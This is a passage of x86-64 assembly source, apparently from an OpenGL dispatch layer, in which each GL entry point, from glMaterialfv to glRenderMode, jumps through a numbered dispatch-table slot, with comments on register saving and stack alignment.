	call _x86_64_get_dispatch@PLT
	movq 1360(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1360(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1360(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1360(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Materialfv), .-GL_PREFIX(Materialfv)
	.p2align 4,,15
	.globl GL_PREFIX(Materiali)
	.type GL_PREFIX(Materiali), @function
/* glMateriali: jump through dispatch-table slot 171 (byte offset 1368). */
GL_PREFIX(Materiali):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1368(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1368(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1368(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1368(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Materiali), .-GL_PREFIX(Materiali)
	.p2align 4,,15
	.globl GL_PREFIX(Materialiv)
	.type GL_PREFIX(Materialiv), @function
/* glMaterialiv: jump through dispatch-table slot 172 (byte offset 1376). */
GL_PREFIX(Materialiv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1376(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1376(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1376(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1376(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Materialiv), .-GL_PREFIX(Materialiv)
	.p2align 4,,15
	.globl GL_PREFIX(PointSize)
	.type GL_PREFIX(PointSize), @function
/* glPointSize: jump through dispatch-table slot 173 (byte offset 1384).
 * The single float arg (%xmm0) is spilled around the lookup call. */
GL_PREFIX(PointSize):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1384(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $8, %rsp	/* one 8-byte spill slot; keeps %rsp 16-aligned */
	movq %xmm0, (%rsp)
	call _x86_64_get_dispatch@PLT
	movq (%rsp), %xmm0
	addq $8, %rsp
	movq 1384(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1384(%rax), %r11
	jmp *%r11
1:
	subq $8, %rsp
	movq %xmm0, (%rsp)
	call _glapi_get_dispatch
	movq (%rsp), %xmm0
	addq $8, %rsp
	movq 1384(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(PointSize), .-GL_PREFIX(PointSize)
	.p2align 4,,15
	.globl GL_PREFIX(PolygonMode)
	.type GL_PREFIX(PolygonMode), @function
/* glPolygonMode: jump through dispatch-table slot 174 (byte offset 1392). */
GL_PREFIX(PolygonMode):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1392(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1392(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1392(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1392(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(PolygonMode), .-GL_PREFIX(PolygonMode)
	.p2align 4,,15
	.globl GL_PREFIX(PolygonStipple)
	.type GL_PREFIX(PolygonStipple), @function
/* glPolygonStipple: jump through dispatch-table slot 175 (byte offset 1400). */
GL_PREFIX(PolygonStipple):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1400(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the pointer argument across the call */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1400(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1400(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1400(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(PolygonStipple), .-GL_PREFIX(PolygonStipple)
	.p2align 4,,15
	.globl GL_PREFIX(Scissor)
	.type GL_PREFIX(Scissor), @function
/* glScissor: jump through dispatch-table slot 176 (byte offset 1408). */
GL_PREFIX(Scissor):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1408(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the four integer argument registers */
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1408(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1408(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1408(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Scissor), .-GL_PREFIX(Scissor)
	.p2align 4,,15
	.globl GL_PREFIX(ShadeModel)
	.type GL_PREFIX(ShadeModel), @function
/* glShadeModel: jump through dispatch-table slot 177 (byte offset 1416). */
GL_PREFIX(ShadeModel):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1416(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the single argument across the call */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1416(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1416(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1416(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(ShadeModel), .-GL_PREFIX(ShadeModel)
	.p2align 4,,15
	.globl GL_PREFIX(TexParameterf)
	.type GL_PREFIX(TexParameterf), @function
/* glTexParameterf: jump through dispatch-table slot 178 (byte offset 1424).
 * Two integer args (%rdi, %rsi) and one float arg (%xmm0) are spilled
 * around the dispatch-lookup call. */
GL_PREFIX(TexParameterf):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1424(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp	/* spill area; also keeps %rsp 16-byte aligned */
	movq %rdi, (%rsp)
	movq %rsi, 8(%rsp)
	movq %xmm0, 16(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 16(%rsp), %xmm0
	movq 8(%rsp), %rsi
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1424(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1424(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %rdi, (%rsp)
	movq %rsi, 8(%rsp)
	movq %xmm0, 16(%rsp)
	call _glapi_get_dispatch
	movq 16(%rsp), %xmm0
	movq 8(%rsp), %rsi
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1424(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexParameterf), .-GL_PREFIX(TexParameterf)
	.p2align 4,,15
	.globl GL_PREFIX(TexParameterfv)
	.type GL_PREFIX(TexParameterfv), @function
/* glTexParameterfv: jump through dispatch-table slot 179 (byte offset 1432). */
GL_PREFIX(TexParameterfv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1432(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1432(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1432(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1432(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexParameterfv), .-GL_PREFIX(TexParameterfv)
	.p2align 4,,15
	.globl GL_PREFIX(TexParameteri)
	.type GL_PREFIX(TexParameteri), @function
/* glTexParameteri: jump through dispatch-table slot 180 (byte offset 1440). */
GL_PREFIX(TexParameteri):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1440(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1440(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1440(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1440(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexParameteri), .-GL_PREFIX(TexParameteri)
	.p2align 4,,15
	.globl GL_PREFIX(TexParameteriv)
	.type GL_PREFIX(TexParameteriv), @function
/* glTexParameteriv: jump through dispatch-table slot 181 (byte offset 1448). */
GL_PREFIX(TexParameteriv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1448(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1448(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1448(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1448(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexParameteriv), .-GL_PREFIX(TexParameteriv)
	.p2align 4,,15
	.globl GL_PREFIX(TexImage1D)
	.type GL_PREFIX(TexImage1D), @function
/* glTexImage1D: jump through dispatch-table slot 182 (byte offset 1456).
 * All six integer/pointer argument registers are preserved; the 8th GL
 * argument already lives on the caller's stack and needs no saving. */
GL_PREFIX(TexImage1D):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1456(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save all six register arguments */
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %r8
	pushq %r9
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %r9
	popq %r8
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1456(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1456(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %r8
	pushq %r9
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %r9
	popq %r8
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1456(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexImage1D), .-GL_PREFIX(TexImage1D)
	.p2align 4,,15
	.globl GL_PREFIX(TexImage2D)
	.type GL_PREFIX(TexImage2D), @function
/* glTexImage2D: jump through dispatch-table slot 183 (byte offset 1464).
 * All six integer/pointer argument registers are preserved; stack-passed
 * arguments need no saving. */
GL_PREFIX(TexImage2D):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1464(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save all six register arguments */
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %r8
	pushq %r9
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %r9
	popq %r8
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1464(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1464(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %r8
	pushq %r9
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %r9
	popq %r8
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1464(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexImage2D), .-GL_PREFIX(TexImage2D)
	.p2align 4,,15
	.globl GL_PREFIX(TexEnvf)
	.type GL_PREFIX(TexEnvf), @function
/* glTexEnvf: jump through dispatch-table slot 184 (byte offset 1472).
 * Two integer args (%rdi, %rsi) and one float arg (%xmm0) are spilled
 * around the dispatch-lookup call. */
GL_PREFIX(TexEnvf):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1472(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp	/* spill area; also keeps %rsp 16-byte aligned */
	movq %rdi, (%rsp)
	movq %rsi, 8(%rsp)
	movq %xmm0, 16(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 16(%rsp), %xmm0
	movq 8(%rsp), %rsi
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1472(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1472(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %rdi, (%rsp)
	movq %rsi, 8(%rsp)
	movq %xmm0, 16(%rsp)
	call _glapi_get_dispatch
	movq 16(%rsp), %xmm0
	movq 8(%rsp), %rsi
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1472(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexEnvf), .-GL_PREFIX(TexEnvf)
	.p2align 4,,15
	.globl GL_PREFIX(TexEnvfv)
	.type GL_PREFIX(TexEnvfv), @function
/* glTexEnvfv: jump through dispatch-table slot 185 (byte offset 1480). */
GL_PREFIX(TexEnvfv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1480(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1480(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1480(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1480(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexEnvfv), .-GL_PREFIX(TexEnvfv)
	.p2align 4,,15
	.globl GL_PREFIX(TexEnvi)
	.type GL_PREFIX(TexEnvi), @function
/* glTexEnvi: jump through dispatch-table slot 186 (byte offset 1488). */
GL_PREFIX(TexEnvi):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1488(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1488(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1488(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1488(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexEnvi), .-GL_PREFIX(TexEnvi)
	.p2align 4,,15
	.globl GL_PREFIX(TexEnviv)
	.type GL_PREFIX(TexEnviv), @function
/* glTexEnviv: jump through dispatch-table slot 187 (byte offset 1496). */
GL_PREFIX(TexEnviv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1496(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1496(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1496(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1496(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(TexEnviv), .-GL_PREFIX(TexEnviv)
/* glTexGend dispatch stub: tail-jump through dispatch-table slot 188
 * (byte offset 1504).  One argument arrives in %xmm0, so the non-TLS
 * paths spill %rdi, %rsi and the low quadword of %xmm0 into a 24-byte
 * stack frame around the lookup call (frame size keeps %rsp 16-byte
 * aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(TexGend)
.type GL_PREFIX(TexGend), @function
GL_PREFIX(TexGend):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1504(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1504(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1504(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1504(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGend), .-GL_PREFIX(TexGend)
/* glTexGendv dispatch stub: tail-jump through dispatch-table slot 189
 * (byte offset 1512).  %rdi/%rsi/%rdx are preserved across the lookup
 * call in the non-TLS paths (odd push count keeps %rsp 16-byte
 * aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(TexGendv)
.type GL_PREFIX(TexGendv), @function
GL_PREFIX(TexGendv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1512(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1512(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1512(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1512(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGendv), .-GL_PREFIX(TexGendv)
/* glTexGenf dispatch stub: tail-jump through dispatch-table slot 190
 * (byte offset 1520).  One argument arrives in %xmm0, so the non-TLS
 * paths spill %rdi, %rsi and the low quadword of %xmm0 into a 24-byte
 * stack frame around the lookup call (frame size keeps %rsp 16-byte
 * aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(TexGenf)
.type GL_PREFIX(TexGenf), @function
GL_PREFIX(TexGenf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1520(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1520(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1520(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1520(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGenf), .-GL_PREFIX(TexGenf)
/* glTexGenfv dispatch stub: tail-jump through dispatch-table slot 191
 * (byte offset 1528).  %rdi/%rsi/%rdx are preserved across the lookup
 * call in the non-TLS paths (odd push count keeps %rsp 16-byte
 * aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(TexGenfv)
.type GL_PREFIX(TexGenfv), @function
GL_PREFIX(TexGenfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1528(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1528(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1528(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1528(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGenfv), .-GL_PREFIX(TexGenfv)
/* glTexGeni dispatch stub: tail-jump through dispatch-table slot 192
 * (byte offset 1536).  %rdi/%rsi/%rdx are preserved across the lookup
 * call in the non-TLS paths (odd push count keeps %rsp 16-byte
 * aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(TexGeni)
.type GL_PREFIX(TexGeni), @function
GL_PREFIX(TexGeni):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1536(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1536(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1536(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1536(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGeni), .-GL_PREFIX(TexGeni)
/* glTexGeniv dispatch stub: tail-jump through dispatch-table slot 193
 * (byte offset 1544).  %rdi/%rsi/%rdx are preserved across the lookup
 * call in the non-TLS paths (odd push count keeps %rsp 16-byte
 * aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(TexGeniv)
.type GL_PREFIX(TexGeniv), @function
GL_PREFIX(TexGeniv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1544(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1544(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1544(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1544(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexGeniv), .-GL_PREFIX(TexGeniv)
/* glFeedbackBuffer dispatch stub: tail-jump through dispatch-table
 * slot 194 (byte offset 1552).  %rdi/%rsi/%rdx are preserved across
 * the lookup call in the non-TLS paths (odd push count keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(FeedbackBuffer)
.type GL_PREFIX(FeedbackBuffer), @function
GL_PREFIX(FeedbackBuffer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1552(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1552(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1552(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1552(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FeedbackBuffer), .-GL_PREFIX(FeedbackBuffer)
/* glSelectBuffer dispatch stub: tail-jump through dispatch-table
 * slot 195 (byte offset 1560).  Non-TLS paths save %rdi/%rsi around
 * the lookup call; the extra %rbp push is pure stack-alignment
 * padding (odd push count keeps %rsp 16-byte aligned, and %rbp is
 * callee-saved so the save/restore is harmless). */
.p2align 4,,15
.globl GL_PREFIX(SelectBuffer)
.type GL_PREFIX(SelectBuffer), @function
GL_PREFIX(SelectBuffer):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1560(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1560(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1560(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1560(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SelectBuffer), .-GL_PREFIX(SelectBuffer)
/* glRenderMode dispatch stub: tail-jump through dispatch-table
 * slot 196 (byte offset 1568).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(RenderMode)
.type GL_PREFIX(RenderMode), @function
GL_PREFIX(RenderMode):
#if defined(GLX_USE_TLS)
